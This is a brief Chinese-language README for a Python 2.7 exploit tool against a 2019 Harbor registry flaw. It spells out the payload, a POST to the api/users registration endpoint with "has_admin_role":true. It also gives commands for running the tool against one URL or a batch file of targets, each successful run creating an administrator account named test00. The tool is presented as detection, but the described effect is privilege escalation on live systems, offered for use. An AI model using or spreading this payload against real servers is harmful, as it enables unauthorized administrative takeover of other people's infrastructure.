201909 harbor爆出可利用注册功能添加管理员漏洞,利用注册接口api/users,构造post参数"has_admin_role":true,可直接添加管理员。
本工具支持单个url或批量检测。
python2.7
pip install requests
使用帮助: python harbor-give-me-admin.py -h
单url检测: python harbor-give-me-admin.py -u "https://www.xxx.com/"
//如利用成功,则会添加管理员帐号test00,谨慎操作!
批量检测: python harbor-give-me-admin.py -f urls,txt
//如利用成功,则会添加管理员帐号test00,谨慎操作!
gmail:lsasguge196@gmail.com